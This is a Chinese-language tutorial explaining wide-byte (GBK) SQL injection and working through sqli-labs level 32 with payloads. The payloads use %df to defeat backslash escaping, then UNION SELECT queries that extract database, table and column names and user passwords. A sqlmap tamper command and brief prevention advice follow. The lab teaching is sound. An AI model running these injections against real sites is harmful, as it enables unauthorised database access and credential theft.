【每天学习一点新知识】跟咩咩一起学“宽字节注入”

目录

什么是宽字节？

宽字节注入原理

常用URL编码 

sqli-labs实例 

判断是否存在漏洞

 判断列数及回显

 获取数据

宽字节注入的预防

---

什么是宽字节？

如果一个字符的大小是一个字节的，称为窄字节；如果一个字符的大小是两个字节的，成为宽字节

• 像GB2312、GBK、GB18030、BIG5、Shift_JIS等这些编码都是常说的宽字节，也就是只有两字节
• 英文默认占一个字节，中文占两个字节

宽字节注入原理

简单来说，宽字节注入就是将两个ascii字符误认为是一个宽字节字符。

宽字节注入是利用mysql的一个特性，mysql在使用GBK编码的时候，会认为两个字符是一个汉字（前一个ascii码要大于128，才到汉字的范围）

GBK首字节对应0×81-0xFE，尾字节对应0×40-0xFE（除0×7F），例如%df和%5C会结合；GB2312是被GBK兼容的，它的高位范围是0xA1-0xF7，低位范围是0xA1-0xFE(0x5C不在该范围内)，因此不能使用编码吃掉%5c

        通常我们sql注入会输入id=1'或id=1''进行测试，如果数据库过滤不严格就会产生报错，宽字节注入会在 ' 前加入 \，加入反斜线之后，起到一个转义作用，这样，存在的 ' 就会失去注入的功能。

        我们利用宽注入的原理，输入id=1%df'，页面就会发生报错，这是因为GBK编码认为一个汉字占两个字节，\的url编码是%5C，加上 %df ，前面两个字符就会拼接为 %df%5c被识别为一个汉字。这样，\自动消失，转义作用在此失效。重新构造出来的汉字叫是真实存在但是浏览器不能很好识别的一个汉字。

        理论上可以不一定要使用%df，像%81 、%a1经测试也是可以实现的，只要能够重新构造出一个真实存在且不能被浏览器很好识别的汉字，并且编码能够包含%5c使\失效的字符都可以。

常用URL编码 

’ ——> %27

空格 ——> %20

#符号 ——> %23

\ ——> %5C

sqli-labs实例 

以sqli-labs的第32关为例

 输入?id=1'，发现'前面加上了\，被转义

 输入?id=1%df'，页面报错

判断是否存在漏洞

?id=1%df' and 1 --+ 

 ?id=1%df' and 0 --+ 

 判断列数及回显

 ?id=1%df' order by 3 --+ （经过试验得知列数为3）

 ?id=-1%df' union select 1,2,3 --+

 获取数据

库名：?id=-1%df' union select 1,database(),3 --+

表名：?id=-1%df' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=database())--+ 

列名： ?id=-1%df' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name=0x7573657273)--+

因为不能出现单引号，于是我们在users前面加入0x，然后将users转化为16进制

字段值：?id=-1%df' union select 1,2,(select group_concat(username,password) from security.users)--+

还在别人的博客里看见了用sqlmap实现宽字节注入。（我还没尝试过）

使用unmagicquotes.py脚本即可。执行：sqlmap -u http://192.168.15.146/sqli-labs-master/Less-32/?id=1 --tamper unmagicquotes.py

宽字节注入的预防

• 先调用mysql_set_charset函数设置连接使用的字符集为gbk，再调用mysql_real_escape_string函数对用户的输入进行转义(该函数比addslashes函数安全)
• 这样当用户输入%df' 即 %df%5c 时 mysql 就会把他直接编码为 運 ，mysql_real_escape_string函数是不会对%5c再添加%5c进行转义的。这样就预防住宽字节注入了。